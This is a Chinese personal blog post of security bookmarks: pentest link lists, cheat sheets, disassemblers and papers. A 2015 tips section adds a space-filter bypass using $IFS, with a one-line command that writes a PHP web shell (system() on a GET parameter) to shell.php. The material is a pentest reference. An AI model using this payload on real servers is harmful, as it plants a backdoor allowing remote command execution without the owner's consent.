累毫不愛的在線知識庫--BookMarks

        好久沒有更新博客了，最近一直折騰離職的事情，轉了一大圈仍是沒有離職而去，我想說公司領導層真夠折騰人的，最近真是身心疲憊。

        今日就先更一個，稍後待補，太多了。

        http://www.proactiverisk.com/home/proactivetools  checklist cheat-sheet paper tools audit

        http://www.windowsecurity.com/whitepapers/    Papers

        https://labs.mwrinfosecurity.com/publications/    WP8 Security Report

        http://www.nothink.org/misc/snmp_reflected.php      SNMP Reflected Amplification DDoS Attack

        http://www.nothink.org/misc/android.php    Android Misc   

        http://www.nothink.org/sandbox_and_utilities.php    So...so..

        https://prism-break.org    keke......instead of all

        http://www.aldeid.com/  security wiki

        http://onlinedisassembler.com/odaweb/  Online DisAssembler

        https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet  SQLite Injection Cheatsheet 

        http://corelabs.coresecurity.com/index.php?module=Wiki&action=list&type=publication

        https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList    pentest-bookmarks

        http://yehg.net/lab/pr0js/misc/wsa.php Online Tools

        http://archive.liquidmatrix.org    Global Security Conference video

        http://www.blackarch.org/tools.html  Many Security tools

        http://blog.idf.cn/%E8%B5%84%E6%BA%90%E6%8E%A8%E8%8D%90/ security article recommend

        http://technet.microsoft.com/en-us/security/cc308575#0414     Researcher's blog

        http://data.ceh.vn/Ebook/ebooks.shahed.biz/HACK/  hack、develop、design book

        https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines WebAppSec/Secure Coding Guidelines

        http://www.linuxtopia.org/  On-line Linux and Open Source Technology Books and How To Guides

        https://msdn.microsoft.com/en-us/library/jj712081.aspx  windows 各類協議文檔

 

Tips:(2015.8.16更)

    不容許使用空格的php代碼執行繞過：（使用$IFS代替空格或tab）

        echo$IFS」<?=system(\$_GET[x]);?>」>shell.php
        If you wanted to wget something: wget$IFS」https://google.com/robots.txt」

    https://www.torontowebsitedeveloper.com/hacking-resources  很是不錯

   https://passivetotal.org  查詢域名歷史IP地址